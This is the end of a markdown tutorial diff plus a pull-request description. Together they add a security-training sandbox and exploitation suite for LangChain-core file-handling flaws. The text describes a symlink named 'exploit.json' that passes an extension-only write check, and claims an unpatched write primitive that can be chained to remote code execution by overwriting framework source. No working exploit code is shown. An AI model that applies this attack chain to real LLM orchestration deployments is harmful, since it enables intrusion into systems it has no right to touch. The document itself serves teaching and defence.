+PR #36585 validates the file extension but ignores the **write destination**. A symlink named `exploit.json` pointing to any `.json` file (including framework source) passes the check. This is the root cause of the unpatched write primitive.
+
+### What a True Fix Requires
+
+| Requirement | Current State | Target State |
+|-------------|---------------|--------------|
+| Path Anchoring | `allow_dangerous_paths` only on read-side | Mandatory `SafeRoot` enforcement on **all** file I/O |
+| Symlink Handling | No symlink resolution in `document_reader` | Universal `Path.resolve()` + `.is_relative_to()` checks |
+| Write Destination Validation | Only extension check | Full destination containment check |
+| Type-Safe Sinks | User-controlled paths accepted as strings | Strict path type with built-in validation |
+| Centralized File I/O | Multiple tools with independent logic | Single audited file I/O utility |
+
+Until orchestration frameworks adopt these architectural changes, **runtime filters and per‑function patches are a mandatory corporate stopgap — but they are not a cure.**
+
+---
+
+## References
+
+- **White Paper:** [JDP-2026-004: Architectural Boundary Failures in LangChain-Core](https://jdp-security.github.io/security-research-papers/2026-05-12-langchain-orchestration-poisoning-disclosure.html)
+- **CVE-2026-34070:** Direct path traversal in `load_prompt_from_config`
+- **CVE-2023-36258:** Suffix validation bypass via symlink
+- **PR #36471:** Read-side patch (incomplete)
+- **PR #36585:** Write-side patch (insufficient)
+- **CWE-22:** Path Traversal
+- **CWE-59:** Improper Link Resolution
+- **CWE-94:** Code Injection
+- **OWASP LLM06:** Insecure Orchestration
+- **OWASP GenAI Red Teaming Manual:** Proposed Playbooks (June 2026)
+


### PR DESCRIPTION
## Summary

This PR adds a new sandbox and exploitation suite for LangChain-core
Insecure Orchestration vulnerabilities (JDP-2026-004).

## Sandbox: sandboxes/agentic_local_langchain/

- 5 stages covering v1.2.24 through latest (tested up to v1.6.0 as of August 2026)
- Demonstrates CVE-2026-34070, CVE-2023-36258, and unpatched write primitive
- Pre-created symlink for CWE-59 demonstration
- Makefile with build/run/stop lifecycle management

## Exploitation: exploitation/langchain/

- Interactive trainer with 4 core lessons + guided auto-pilot mode
- White paper verification suite (4 tests per stage)
- Submission audit report
- Built-in container management (start/stop/switch stages)

## Tutorial: tutorials/langchain_orchestration_poisoning_tutorial.md

- Full walkthrough with exercises and architectural analysis
- Covers the mitigation paradox and SCA blindness risks

## Root README updated

- Added directory structure entries
- Added sandbox and exploitation index entries

## Key Findings

- Direct read patched in v1.2.25+ (CVE-2026-34070)
- Symlink read **NEVER PATCHED** (CVE-2023-36258)
- Write primitive **NEVER PATCHED** (no CVE assigned)
- RCE chain achievable via framework source overwrite

## Reference

- White Paper: https://jdp-security.github.io/security-research-papers/2026-05-12-langchain-orchestration-poisoning-disclosure.html
